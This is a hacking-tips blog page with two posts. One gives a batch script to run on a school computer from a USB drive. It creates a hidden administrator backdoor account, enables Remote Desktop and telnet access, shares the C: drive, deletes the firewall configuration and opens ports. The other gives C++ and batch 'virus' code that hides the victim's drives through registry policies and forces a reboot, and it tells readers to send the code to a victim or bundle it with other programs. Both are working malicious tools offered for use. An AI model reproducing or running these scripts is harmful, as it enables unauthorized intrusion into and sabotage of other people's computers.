- Save as .bat fileNow wat if i can hack mah school coimputer from mah home ? Will'nt it be too good to share ? Well dont worry m sharing this with you.
There are two ways to do so:
(i) Dropping a trojan.
(ii) Creating a batch file encoded in Net Framework and applying it.
Well i will cover the trojan trick later on. Now just concentrate on the batch file. Its just as easy as typing something in notepad and then saving it.
Tools required:
- Pen Drive / USB drive
- Mind
- A lil bit of time.
Now What you gotta do :
- Copy the below code
- Paste in notepad
- Save as .bat file
Code :
@echo offREM ......: Created By Jigsaw :......REM ......: HackPcOnline.Com :......
REM EDIT THESE SETTINGSset username=USERNAMEset password=PASSWORDset rdport=3389set tnport=23set rport=CHANGE_THISREM END EDITING SETTINGS
REM Adding The Backdoornet user %username% %password% /addREM Pause For Processping localhost -n 2 >nulREM Adding Admin Access The Backdoornet localgroup Administrators %username% /addREM Hiding The Backdoor From Start MenuREG add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /%username% /t REG_DWORD /d 0 /f >nulREM Enabling Terminal ServiceREG add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0REM Share C:\net share system=C:\ /unlimitedREM Stealing The IP Stuffipconfig /all >> C:\attach.txtREM Deleting The Firewall Configurationnetsh firewall deleteREM Opening Portsnetsh firewall add portopening TCP %rdport% "WinSvcService"netsh firewall add portopening TCP %tnport2% "WinSvcService"netsh firewall add portopening TCP %rport% "WinSvcService"clsexit
You can change the username, password and the rport (randomn port you choose to be opened)
At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.
Save it and remove your pen drive.
Now run this bat file in ur school Pc.Now when you get to your home, just telnet the pc or Remote desktop it.You are done gyes !!
All about computer tips and tricks. learn some wonderful trick from notepad.. cool computer ticks no no experience needed
Sunday, 24 July 2011
How to Hack your School Computers
Monday, 11 July 2011
C++ ,Batch Virus code to disable Hard disk
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also.
C++ Virus Code :
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
C++ Virus Code :
#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/
write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }
- Copy the above code and paste in notepad
- Save the file with .cpp extension
- Compile and create .exe file in cpp
Don't run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other exe files.
Batch Virus Code Creation:
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n
REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n
shutdown -r -c \"Sorry Your System is hacked by us!\" -f
I think this code will simple for non c++ programmers. It is easy to create the batch file also.
- Copy the above code to notepad.
- Save it with .bat extension (for ex: nodrivevirus.bat)
- Send the file to your victim
Subscribe to:
Comments (Atom)

